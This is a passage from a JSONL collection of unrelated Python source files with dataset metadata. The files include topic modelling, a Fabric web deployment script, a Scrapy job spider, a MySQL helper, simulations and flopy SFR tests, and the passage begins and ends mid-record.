file\")\nparser.add_argument(\"-o\", \"--output\", type=str, default=\".\", help=\"output folder\")  # output folder for the generated topic files (referenced below as args.output)\nargs = parser.parse_args()\n\nif args.file != \"-\":\n    raw = io.open(args.file, 'r',encoding='utf-8')\n    txt = raw.read().lower()\n    path = os.path.dirname(args.file) + 
\"/\"\n tweets = pd.read_csv(args.file)\n print(\"Number of tweets:\",len(tweets['Tweet']))\n\nfor i in range(len(tweets['Tweet'])):\n a=tweets['Tweet'][i]\n corpus.append(a)\nTEMP_FOLDER = tempfile.gettempdir()\nprint('Folder \"{}\" will be used to save temporary dictionary and corpus.'.format(TEMP_FOLDER))\n\nno_features = 500\nmy_additional_stop_words = []\nstop_words = text.ENGLISH_STOP_WORDS.union(my_additional_stop_words)\n\n# NMF - tf-idf\ntfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=no_features, stop_words=stop_words)\ntfidf = tfidf_vectorizer.fit_transform(corpus)\ntfidf_feature_names = tfidf_vectorizer.get_feature_names()\n\ntf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=no_features, stop_words=stop_words)\ntf = tf_vectorizer.fit_transform(corpus)\ntf_feature_names = tf_vectorizer.get_feature_names()\n\nno_topics = 20\n\n# Run NMF\nnmf = NMF(n_components=no_topics, random_state=1, alpha=.1, l1_ratio=.5, init='nndsvd').fit(tfidf)\n\n# Run LDA\nlda = LatentDirichletAllocation(n_components=no_topics, max_iter=5, learning_method='online', learning_offset=50.,random_state=0).fit(tf)\n\ndef display_topics(model, feature_names, no_top_words):\n for topic_idx, topic in enumerate(model.components_):\n top_words = []\n for i in topic.argsort()[:-no_top_words - 1:-1]:\n top_words.append(feature_names[i])\n print(\"Topic %d:\" % (topic_idx))\n print(\" \".join([feature_names[i]\n for i in topic.argsort()[:-no_top_words - 1:-1]]))\n json_lda_topics.append( {\"topic\": topic_idx, \"top_words\": top_words} )\n csv_lda_topics[topic_idx] = top_words\n\nno_top_words = 10\n#display_topics(nmf, tfidf_feature_names, no_top_words)\ndisplay_topics(lda, tf_feature_names, no_top_words)\n\nkeys = sorted(csv_lda_topics.keys())\nwith open(args.output + \"/topics(sklearn).csv\", \"w\") as outfile:\n writer = csv.writer(outfile)\n writer.writerow(keys)\n writer.writerows(zip(*[csv_lda_topics[key] for key in keys]))\n\nwith open(args.output + \"/topics(sklearn).json\", 'w') as fp:\n json.dump(json_lda_topics, fp)\n","sub_path":"topics-LDA.py","file_name":"topics-LDA.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80942621","text":"'''\nFor the sake of validation, we use a seperate class, where we can record our\ntrials, after which we claim various statistics.\n'''\n\nimport numpy as np\nfrom collections import Counter\n\ndef tester(num_label):\n '''Factory method'''\n return Tests(num_label)\n\n\ndef identity(o):\n return o\n\n\nclass Tests(object):\n '''\n '''\n def __init__(self, num_label):\n self.num_label = num_label\n self.true = []\n self.predicted = []\n\n\n def record(self, true, predicted):\n # sanity check\n assert(len(true) == len(predicted))\n\n # the recorded values will be used later\n self.true.extend(true)\n self.predicted.extend(predicted)\n\n\n def recordMeta(self, meta):\n self.meta = meta\n\n\n def goThroughWith(self, func):\n size = len(self.true)\n collected = []\n\n for i in range(size):\n item = func(self.true[i], self.predicted[i], self.meta[i])\n if item:\n collected.append(item)\n\n return collected\n\n\n def getMissClassifiedScreenNamesInAge(self, age_range):\n assert(len(age_range) == 2) # sanity check\n\n def pickUpScreenName(true, predict, meta):\n age = meta['age']\n if true != predict and age_range[0] <= age <= age_range[1]:\n return meta['screen_name']\n\n return self.goThroughWith(pickUpScreenName)\n\n\n def 
collectMissClassificationByAge(self):\n ''' Returns a counter that contains the occurrence of missclassification\n for each age. '''\n size = len(self.true)\n collect_ages = []\n\n for i in range(size):\n if self.true[i] != self.predicted[i]:\n age = self.meta[i]['age']\n collect_ages.append(age)\n\n cnt = Counter(collect_ages)\n return cnt\n\n\n def collectTrueLabelsByAge(self):\n size = len(self.true)\n collect_ages = []\n\n for i in range(size):\n age = self.meta[i]['age']\n collect_ages.append(age)\n\n cnt = Counter(collect_ages)\n return cnt\n\n\n def confusionMatrix(self, inverse = identity):\n ''' If the labels in true and predicted lists are in non-numerical ones,\n one should provide a way to revert the label to the index used in the\n confusion matrix '''\n dim = self.num_label # dimension\n conf = np.zeros((dim, dim), dtype=int) # confusion matrix\n\n for i in range(len(self.true)):\n t = inverse(self.true[i])\n p = inverse(self.predicted[i])\n conf[t, p] += 1\n\n return conf\n\n\n def accuracy(self):\n size = len(self.true)\n correct = 0\n\n for i in range(size):\n if self.true[i] == self.predicted[i]:\n correct += 1\n\n return float(correct) / float(size)\n\n\n\n","sub_path":"code_backup/py/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"188166475","text":"import spline\nimport numpy as np\n\nmspl = spline.SPLINT\n\nclass REC_SPL:\n\n def __init__(self, rho, dat, sigmas, erbar, x_out):\n\n self.rec_spline(rho, dat, sigmas, erbar, x_out)\n\n def rec_spline(self, rho, dat, sigmas, erbar, x_out):\n\n finished = False\n spl = mspl(rho, dat, erbar, x_out, 1)\n yspl2 = spl.y_fit\n self.ind_not = []\n while not finished:\n yp_ref = np.interp(rho, x_out, yspl2)\n y_diff = np.abs(dat - yp_ref)\n jr = np.argmax(y_diff)\n toler = sigmas*erbar*np.max(np.abs(yp_ref))\n if y_diff[jr] > toler:\n self.ind_not.append(jr)\n rho = np.delete(rho, jr)\n dat = np.delete(dat, jr)\n spl = mspl(rho, dat, erbar, x_out, 1)\n yspl2 = spl.y_fit\n else:\n finished = True\n self.yrec = yspl2\n self.rho = rho\n self.dat = dat\n","sub_path":"rec_spline.py","file_name":"rec_spline.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"426234666","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 25 20:16:06 2019\n\n@author: hiparco\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nG = 1\n\nJEANS05 = -4\nJEANS11 = -2\n\nCONDITION = JEANS05;\n#CONDITION = JEANS11;\n\nkkj = 0.5\nL = 1\nXmin = -L/2\nXmax = Xmin+L\nV = 1\nVmin = -V\nVmax = Vmin + 2*V\nT = L/V\nk = 2 * (2*np.pi/L)\n\nrho = 1.0/(T**2 *G)\n\nsigma = np.sqrt(4*G*np.pi*rho*kkj**2/k**2)\n\nprint(2*sigma**2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"init_con.py","file_name":"init_con.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485232332","text":"#tkinter is a module that holds all the function\n#that let us easily make GUI elements\nimport tkinter as tk\n\n\n#creating the main window\n#To do this we need to call the TK() function\nroot = tk.Tk()\nlabel = tk.Label(root, text = \"Welcome to Concentration\")\nlabel.grid(row = 0, column = 0, columnspan = 2)\n\nbtn1 = tk.Button(root,text =\"1\")\nbtn1.config(width = 5, height = 5)\nbtn1.grid(row = 1, column = 0, 
sticky = \"NESW\")\n\nbtn2 = tk.Button(root,text =\"2\")\nbtn2.config(width = 5, height = 5)\nbtn2.grid(row = 1, column = 1, sticky = \"NESW\")\n\n\nbtn3 = tk.Button(root,text =\"3\")\nbtn3.grid(row = 2, column = 0, sticky = \"NESW\")\nbtn3.config(width = 5, height = 5)\n\n\nbtn4 = tk.Button(root,text =\"4\")\nbtn4.grid(row = 2, column = 1, sticky = \"NESW\")\nbtn4.config(width = 5, height = 5)\n\n\n#This line displays the root and sets the program\n#in an infinite loop. This is an EVENT DRIVEN PROGRAM\n\nroot.mainloop()\n#All of this code above generates the window and the comments below \n#import tkinter as tk\n#root = tk.Tk()\n#root.mainloop() \n","sub_path":"GUIgridDemo.py","file_name":"GUIgridDemo.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"290689420","text":"# modules\nimport unittest\nimport json\nfrom unittest.mock import patch\n\n# handler\nfrom main import handler, make_url\n\n# data\nEVENT = {\n    'queryStringParameters': {\n        'ingredients': 'avocado,sugar'\n    },\n    'path': '/test',\n    'method': 'GET'\n}\n\nCONTEXT = {}\n\nclass TestHandler(unittest.TestCase):\n    def setUp (self):\n        '''\n        Setup test case\n        '''\n        self.evt = EVENT\n        self.cxt = CONTEXT\n\n    def test_make_url (self):\n        '''\n        Test making the url\n        '''\n        path = '/test'\n        params = {\n            'ingredients': 'avocado,sugar',\n            'query': 'value'\n        }\n        url = make_url(path, params)\n\n        self.assertEqual(url, 'https://api.spoonacular.com/test?ingredients=avocado,sugar&query=value&apiKey=DUMMY_KEY')\n\n        # None params\n        params = None\n        url = make_url(path, params)\n\n        self.assertEqual(url, 'https://api.spoonacular.com/test?apiKey=DUMMY_KEY')\n\n        # Empty params\n        params = {}\n        url = make_url(path, params)\n\n        self.assertEqual(url, 'https://api.spoonacular.com/test?apiKey=DUMMY_KEY')\n\n    @patch('main.requests.request')\n    def test_handler (self, mock):\n        '''\n        Test the request handler\n        '''\n        mock.return_value.status_code = 200\n        mock.return_value.json.return_value = {}\n\n        res = handler(self.evt, self.cxt)\n\n        self.assertEqual(res['statusCode'], 200)\n        self.assertEqual(res['body'], json.dumps({}))\n\n    @patch('main.requests.request')\n    def test_err (self, mock):\n        '''\n        Test request error handling\n        '''\n        mock.return_value.status_code = 500\n        mock.return_value.json.return_value = {}\n\n        res = handler({}, self.cxt)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"30733497","text":"#!/usr/bin/python3\n# Creates and distributes an archive to web servers\n\nfrom fabric.api import *\nfrom os import path\nfrom datetime import datetime\n\n# do_pack = __import__('1-pack_web_static').do_pack\n# do_deploy = __import__('2-do_deploy_web_static').do_deploy\n\nenv.hosts = ['34.73.136.156', '35.196.227.92']\nenv.user = 'ubuntu'\n\nn = datetime.now()\n\n\ndef do_pack():\n    \"\"\"Packs web_static files into .tgz file\"\"\"\n    file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'\\\n        .format(n.year, n.month, n.day, n.hour, n.minute, n.second)\n    local('mkdir -p versions')\n    command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n    if command.succeeded:\n        return file_name\n    return None\n\n\ndef do_deploy(archive_path):\n    \"\"\"Deploys archive\"\"\"\n    if not path.exists(archive_path):\n        return False\n    ret_value = True\n    a = put(archive_path, '/tmp/')\n    if a.failed:\n        ret_value = False\n    arch = archive_path.replace(\".tgz\", 
\"\").replace(\"versions/\", \"\")\n b = run('mkdir -p /data/web_static/releases/' + arch + '/')\n if b.failed:\n ret_value = False\n c = run('tar -xzf /tmp/' + arch + '.tgz' +\n ' -C /data/web_static/releases/' + arch + '/')\n if c.failed:\n ret_value = False\n d = run('rm /tmp/' + arch + '.tgz')\n if d.failed:\n ret_value = False\n e = run('mv /data/web_static/releases/' + arch +\n '/web_static/* /data/web_static/releases/' + arch + '/')\n if e.failed:\n ret_value = False\n f = run('rm -rf /data/web_static/releases/' + arch + '/web_static')\n if f.failed:\n ret_value = False\n g = run('rm -rf /data/web_static/current')\n if g.failed:\n ret_value = False\n h = run('ln -sf /data/web_static/releases/' + arch +\n '/' + ' /data/web_static/current')\n if h.failed:\n ret_value = False\n if ret_value:\n print(\"All tasks succeeded!\")\n return ret_value\n\n\ndef deploy():\n \"\"\"Distribute to all servers\"\"\"\n arch_path = do_pack()\n if arch_path is None:\n return False\n return do_deploy(arch_path)\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198360010","text":"import Class_Car\ndef main():\n myCar = Class_Car.Car(\"BMW\",2012,26000,15,\"Imzoughene\")\n #myCar.SetType(\"BMW\")\n #myCar.SetModel(2012)\n #myCar.SetPrice(26000)\n #myCar.SetMilesDrive(15)\n #myCar.SetOwner(\"Imzoughene\")\n currentPrice=myCar.GetPriceByMiles()\n print(\"{}'s Car : New Price : {}\".format(myCar.GetOwner(),currentPrice))\n\n HamidCar = Class_Car.Car(\"GMC\",2006,28000,7,\"hamid\")\n #HamidCar.SetType(\"GMC\")\n #HamidCar.SetModel(2006)\n #HamidCar.SetPrice(28000)\n #HamidCar.SetMilesDrive(7)\n #HamidCar.SetOwner(\"hamid\")\n currentPrice = HamidCar.GetPriceByMiles()\n print(\"{}'s Car : New Price : {}\".format(HamidCar.GetOwner(),currentPrice))\n\nif __name__ == '__main__':main()","sub_path":"CarMain.py","file_name":"CarMain.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"333179145","text":"\"\"\"\n This spider is a JobCenter24h spider created on top of the ATSSpider\n scrapy crawl jobcenter24h -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://mul.jobcenter24h.de/cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\"\n\n sample seed urls:\n https://ikh.jobcenter24h.de/cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\n https://franz.jobcenter24h.de//cgi-bin/public.pl?frontend=Public::Stellenangebote&application=StellenangeboteBewerber\n\n sample job url:\n https://mul.jobcenter24h.de/cgi-bin/public.pl?frontend=StellenangebotDetails&application=StellenangeboteBewerber&command=showDetails&SessionId_stellenangebote=936710&SessionStellenboerse=mul\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin, urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, ConvertDateString, HtmlFormatter\n\n\nclass JobCenter24h(ATSSpider):\n\n name = \"jobcenter24h\"\n Ref_Num = compile(r\"stellenangebote=(\\S+)&\")\n Location = compile(r\"(\\d+)(\\S+)\")\n Location_another = compile(r\"(\\d+)(\\S+, \\S+)\")\n logo_url = ''\n\n def parse(self, response):\n selector = Selector(response)\n\n if not 
self.expected_job_count_set:\n expected_count = selector.xpath(\n '//div[@id=\"jssStellenangeboteAnzahlAnzeige\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n if not self.logo_url:\n logo_url = selector.xpath(\n '//div[@id=\"jssLogo\"]/a/img/@src |'\n '//div[@id=\"logo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n jobs = selector.xpath('//div[contains(@class, \"jssStellenangeboteBewerberList\")]')\n for job in jobs:\n url = job.xpath('./a/@href').extract()\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'title': job.xpath('./a/text()').extract(),\n 'details': job.xpath('./span[@class=\"jssStellenangeboteListContentFirstLine\"]/text()').extract()\n },\n url=url[0]\n )\n\n next_page_url = selector.xpath('//a[contains(text(), \">>\")]/@href').extract()\n if next_page_url:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page_url[0])\n )\n\n def parse_job(self, response):\n selector = Selector(response)\n description_xpaths = [\n '//div[@id=\"detail_82\"]/div/div[@class=\"sa_txt\"]',\n '//div[@id=\"contentWrapper\"]/div[@id=\"content\"]/div[@id=\"content-text\"]',\n '//div[@id=\"jssStellenangebotContent\"][not(descendant-or-self::a)][not(descendant-or-self::img)]',\n '//h1/following-sibling::node()[not(descendant-or-self::a)][not(descendant-or-self::img)]',\n '//div[@class=\"texte\"]/div[@class=\"aufgaben\"]/..',\n '//tr/td/p[@id=\"headline\"]/..',\n ]\n loader = BrightcorpItemLoader(selector=selector)\n\n details = response.meta.get('details')\n if details:\n splitted_details = ''.join(details).split('aktualisiert:')\n if splitted_details:\n loader.add_value('date', splitted_details[-1], ConvertDateString('%d.%m.%Y'))\n\n loc = self.Location_another.search(''.join(splitted_details[0]))\n if not loc:\n loc = self.Location.search(''.join(splitted_details[0]))\n if loc:\n loader.add_value('location', loc.group(2))\n loader.add_value('zip_code', loc.group(1))\n\n for description_xpath in description_xpaths:\n loader.add_xpath(\n 'description', description_xpath, HtmlFormatter()\n )\n if loader.get_output_value('description'):\n break\n loader.add_value('apply_url', response.url)\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % urlparse(response.url).netloc),\n re=self.Ref_Num\n )\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n loader.add_value('logo_url', self.logo_url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/jobcenter24h.py","file_name":"jobcenter24h.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"517708849","text":"import pandas as pd\nimport csv\n\nhour_filename = 'LPPH.csv'\nperson_filename = 'LPPP.csv'\nsource_filename = 'Data.csv'\n\ndef merge_csv(file1, file2, file3):\n dfH = pd.read_csv(file1, sep=\",\", header=0)\n dfP = pd.read_csv(file2, sep=\",\", header=0)\n dfS = pd.read_csv(file3, sep=\",\", header=0)\n dfS_Lpph_unit = dfS[(dfS['NA_ITEM'] == \"Nominal labour productivity per hour worked\") & (dfS['UNIT'] == \"Index, 2020=100\")]\n dfS_Lppp_unit = dfS[(dfS['NA_ITEM'] == \"Nominal labour productivity per person\") & (dfS['UNIT'] == \"Index, 2020=100\")]\n merge(dfH, dfS_Lpph_unit, dfS, file3)\n merge(dfP, dfS_Lppp_unit, dfS, file3)\n\ndef merge(dfFrom, dfData, dfTo, fileTo):\n for index in list(dfData.index):\n year = 
dfData.at[index, 'TIME']\n        geo = dfData.at[index, 'GEO']\n        if year > 2018:\n            break\n        else:\n            picked_row = dfFrom[(dfFrom['geo-time'] == geo) & (dfFrom[str(year)])]\n            id = int(list(picked_row.index)[0])\n            new_data = picked_row.at[id, str(year)]\n            print(index, \" \", year, \" \", geo, \" \", new_data)\n            dfTo.at[index, 'Value'] = new_data\n\n    dfTo.to_csv(fileTo, index=False, quotechar='\"', quoting=csv.QUOTE_ALL)\n\n\ndef main():\n    merge_csv(hour_filename, person_filename, source_filename)\n\nif __name__ == \"__main__\":\n    main()","sub_path":"Merge_Data.py","file_name":"Merge_Data.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"232734300","text":"S = list(input())\n\nblue = S.count('1')\nred = len(S) - blue\n\nn = min(blue,red)\n\nprint(n * 2)\n'''\ncnt = 0\nwhile True:\n    if(S == []):\n        break\n    for i in range(len(S)-1):\n        if(S[i] == '0' and S[i+1] == '1') or (S[i] == '1' and S[i+1] == '0'):\n            S = S[:i] + S[i+2:]\n            cnt += 2\n            break\n    else:\n        break\nprint(cnt)\n'''\n","sub_path":"ABC120/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"589236270","text":"\"\"\"\n9-12. Multiple modules: save the User class in one module, and the Privileges\nand Admin classes in another module. In a separate file, create an Admin instance\nand call the show_privileges() method to show that everything works correctly.\n\"\"\"\nfrom admin_privileges import Admin\n\nadm = Admin('Ivan', 'Ivanov', 'admin@mail.ru', 'admin')\nprint('Privileges', end=\": \")\nadm.describe_user()\nadm.privileges.show_privileges()\n","sub_path":"Мэтиз: Изучаем Python/class/user/9-12.py","file_name":"9-12.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"610977649","text":"#encoding:utf-8\n\nimport MySQLdb\nimport logging\n\n\"\"\"\n    Database manager class\n    1. onTimer must be called periodically to keep the connection alive\n    2. Use select for queries, querry for everything else\n\"\"\"\n\nclass DBManager(object):\n    m_ip = ''\n    m_port = 0\n    m_user = ''\n    m_pwd = ''\n    m_datatable = ''\n    m_charset = ''\n\n    dbConn = None\n    isConnected = False\n    reNowCount = 0 # time elapsed since the last ping\n    reConnTime = 60 # ping the db automatically every 60 seconds\n\n    def init(self, ip,port,user=\"root\",pwd=\"123456\",database=\"py_test\",charset=\"utf8\"):\n        try:\n            self.m_ip = ip\n            self.m_port = port\n            self.m_user = user\n            self.m_pwd = pwd\n            self.m_datatable = database\n            self.m_charset = charset\n            logging.info(\"ip=%s,port=%d,user=%s,pwd=%s,database=%s,charset=%s\" % (self.m_ip, self.m_port, self.m_user, self.m_pwd, self.m_datatable, self.m_charset))\n            self.dbConn = MySQLdb.Connect(host = self.m_ip,\n                                          port = self.m_port,\n                                          user = self.m_user,\n                                          passwd = self.m_pwd,\n                                          db = self.m_datatable,\n                                          charset = self.m_charset)\n            self.isConnected = True\n            return True\n        except BaseException as e:\n            raise\n    ## def init(self, ip, port, user, passwd, datatable):\n\n    def mPing(self):\n        if not self.dbConn or not self.isConnected:\n            try:\n                self.dbConn = MySQLdb.Connect(host=self.m_ip,\n                                              port=self.m_port,\n                                              user=self.m_user,\n                                              passwd=self.m_pwd,\n                                              db=self.m_datatable,\n                                              charset='utf8')\n                self.isConnected = True\n            except BaseException as e:\n                logging.exception(e)\n                self.isConnected = False\n                return\n        # noinspection PyBroadException\n        try:\n            self.dbConn.ping()\n        except:\n            self.dbConn.ping(True)\n    ## def mPing(self):\n\n    def onTimer(self):\n        self.reNowCount += 1\n        if self.reNowCount % 
self.reConnTime == 0:\n self.mPing()\n self.reNowCount = 0\n ## def onTimer(self):\n\n def select(self, sqlstr = ''):\n if not self.isConnected:\n logging.error(\"db is not connected\")\n return False, 0, []\n try:\n tmpCursor = self.dbConn.cursor()\n row = tmpCursor.execute(sqlstr)\n self.dbConn.commit()\n result = tmpCursor.fetchall()\n tmpCursor.close()\n return True, row, result\n except BaseException as e:\n logging.exception(e)\n tmpCursor.close()\n return False, 0, []\n ## def select(self, sqlstr = ''):\n\n def querry(self, sqlstr = ''):\n if not self.isConnected:\n logging.error(\"db is not connected\")\n return False, 0, []\n try:\n tmpCursor = self.dbConn.cursor()\n row = tmpCursor.execute(sqlstr)\n self.dbConn.commit()\n result = tmpCursor.fetchall()\n tmpCursor.close()\n return True, row, result\n except BaseException as e:\n self.dbConn.rollback()\n tmpCursor.close()\n logging.exception(e)\n return False, 0, []\n ## def querry(self, sqlstr = ''):\n\ngDBManager = DBManager()","sub_path":"base/DBManager.py","file_name":"DBManager.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595822422","text":"'''Module to demonstrate a random walk of 500 sailors on an island, which is\r\na circle of radius 10m, with step size of 1m and equal probably of stepping\r\nin any direction. Calculates and returns the mean number of steps sailors\r\nmake until they fall into water as well as the time until 90% of the sailors\r\nfall into the water when walking at a speed of 1 step per minute.'''\r\n\r\nfrom __future__ import division\r\n\r\nimport random\r\nimport numpy as np\r\n\r\ndef sailors():\r\n '''Function which demonstrates a random walk of 500 sailors on an island, which is\r\na circle of radius 10m, with step size of 1m and equal probably of stepping\r\nin any direction. 
Calculates and returns the mean number of steps sailors\r\nmake until they fall into water as well as the time until 90% of the sailors\r\nfall into the water when walking at a speed of 1 step per minute.'''\r\n nsailors = 500\r\n nsteps = []\r\n\r\n for i in range(nsailors):\r\n steps = 0\r\n xpos, ypos = 0, 0\r\n radius = np.sqrt(xpos**2 + ypos**2)\r\n while radius <= 10:\r\n prob = random.random()\r\n if prob <= 0.25:\r\n xpos += 1\r\n elif prob <= 0.5:\r\n ypos += 1\r\n elif prob <= 0.75:\r\n xpos -= 1\r\n else:\r\n ypos -= 1\r\n radius = np.sqrt(xpos**2 + ypos**2)\r\n steps += 1\r\n nsteps.append(steps)\r\n\r\n mean = 0\r\n for i in nsteps:\r\n mean += i\r\n mean /= nsailors\r\n\r\n nsteps.sort()\r\n time = nsteps[449]\r\n\r\n return (mean, time)\r\n","sub_path":"Computational Physics/q17u1306340.py","file_name":"q17u1306340.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"222967314","text":"__author__ = 'aleaf'\n\nimport sys\nsys.path.append('/Users/aleaf/Documents/GitHub/flopy3')\nimport os\nimport glob\nimport shutil\nimport numpy as np\nfrom flopy.utils.recarray_utils import create_empty_recarray\n\ntry:\n import matplotlib\n # if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?\n # matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend\nexcept:\n matplotlib = None\n\nimport flopy\nfm = flopy.modflow\nfrom flopy.utils.sfroutputfile import SfrFile\nfrom flopy.discretization import StructuredGrid\nfrom flopy.utils.reference import SpatialReference\n\nif os.path.split(os.getcwd())[-1] == 'flopy3':\n path = os.path.join('examples', 'data', 'mf2005_test')\n path2 = os.path.join('examples', 'data', 'sfr_test')\n outpath = os.path.join('py.test/temp')\nelse:\n path = os.path.join('..', 'examples', 'data', 'mf2005_test')\n path2 = os.path.join('..', 'examples', 'data', 'sfr_test')\n outpath = os.path.join('temp', 't009')\n # make the directory if it does not exist\n if not os.path.isdir(outpath):\n os.makedirs(outpath)\n\nsfr_items = {0: {'mfnam': 'test1ss.nam',\n 'sfrfile': 'test1ss.sfr'},\n 1: {'mfnam': 'test1tr.nam',\n 'sfrfile': 'test1tr.sfr'},\n 2: {'mfnam': 'testsfr2_tab.nam',\n 'sfrfile': 'testsfr2_tab_ICALC1.sfr'},\n 3: {'mfnam': 'testsfr2_tab.nam',\n 'sfrfile': 'testsfr2_tab_ICALC2.sfr'},\n 4: {'mfnam': 'testsfr2.nam',\n 'sfrfile': 'testsfr2.sfr'},\n 5: {'mfnam': 'UZFtest2.nam',\n 'sfrfile': 'UZFtest2.sfr'},\n 6: {'mfnam': 'TL2009.nam',\n 'sfrfile': 'TL2009.sfr'}\n }\n\ndef create_sfr_data():\n dtype = np.dtype([('k', int),\n ('i', int),\n ('j', int),\n ('iseg', int),\n ('ireach', int)])\n r = create_empty_recarray(27, dtype=dtype)\n r['i'] = [3, 4, 5,\n 7, 8, 9,\n 0, 1, 2,\n 4, 4, 5,\n 0, 0, 0,\n 3, 4, 5,\n 0, 1, 2,\n 4, 5, 6,\n 2, 2, 2]\n r['j'] = [0, 1, 2,\n 6, 6, 6,\n 6, 6, 6,\n 3, 4, 5,\n 9, 8, 7,\n 6, 6, 6,\n 0, 0, 0,\n 6, 6, 6,\n 9, 8, 7]\n r['iseg'] = sorted(list(range(1, 10)) * 3)\n r['ireach'] = [1, 2, 3] * 9\n\n d = create_empty_recarray(9, dtype=np.dtype([('nseg', int), ('outseg', int)]))\n d['nseg'] = range(1, 10)\n d['outseg'] = [4, 0, 6, 8, 3, 8, 1, 2, 8]\n return r, d\n\ndef sfr_process(mfnam, sfrfile, model_ws, outfolder=outpath):\n m = flopy.modflow.Modflow.load(mfnam, model_ws=model_ws, verbose=False)\n sfr = m.get_package('SFR')\n\n if not os.path.exists(outfolder):\n os.makedirs(outfolder)\n outpath = os.path.join(outfolder, sfrfile)\n sfr.write_file(outpath)\n\n m.remove_package('SFR')\n sfr2 = 
flopy.modflow.ModflowSfr2.load(outpath, m)\n\n assert np.all(sfr2.reach_data == sfr.reach_data)\n assert np.all(sfr2.dataset_5 == sfr.dataset_5)\n for k, v in sfr2.segment_data.items():\n assert np.all(v == sfr.segment_data[k])\n for k, v in sfr2.channel_flow_data.items():\n assert np.all(v == sfr.channel_flow_data[k])\n for k, v in sfr2.channel_geometry_data.items():\n assert np.all(v == sfr.channel_geometry_data[k])\n\n return m, sfr\n\n\ndef load_sfr_only(sfrfile):\n m = flopy.modflow.Modflow()\n sfr = flopy.modflow.ModflowSfr2.load(sfrfile, m)\n return m, sfr\n\n\ndef load_all_sfr_only(path):\n for i, item in sfr_items.items():\n load_sfr_only(os.path.join(path, item['sfrfile']))\n\n\ndef interpolate_to_reaches(sfr):\n reach_data = sfr.reach_data\n segment_data = sfr.segment_data[0]\n for reachvar, segvars in {'strtop': ('elevup', 'elevdn'),\n 'strthick': ('thickm1', 'thickm2'),\n 'strhc1': ('hcond1', 'hcond2')}.items():\n reach_data[reachvar] = sfr._interpolate_to_reaches(*segvars)\n for seg in segment_data.nseg:\n reaches = reach_data[reach_data.iseg == seg]\n dist = np.cumsum(reaches.rchlen) - 0.5 * reaches.rchlen\n fp = [segment_data[segment_data['nseg'] == seg][segvars[0]][0],\n segment_data[segment_data['nseg'] == seg][segvars[1]][0]]\n xp = [dist[0], dist[-1]]\n assert np.sum(np.abs(\n reaches[reachvar] - np.interp(dist, xp, fp).tolist())) < 0.01\n return reach_data\n\n\ndef test_sfr():\n load_all_sfr_only(path2)\n\n m, sfr = sfr_process('test1ss.nam', 'test1ss.sfr', path)\n\n m, sfr = sfr_process('test1tr.nam', 'test1tr.sfr', path)\n\n # assert list(sfr.dataset_5.keys()) == [0, 1]\n\n m, sfr = sfr_process('testsfr2_tab.nam', 'testsfr2_tab_ICALC1.sfr', path)\n\n assert list(sfr.dataset_5.keys()) == list(range(0, 50))\n\n m, sfr = sfr_process('testsfr2_tab.nam', 'testsfr2_tab_ICALC2.sfr', path)\n\n assert 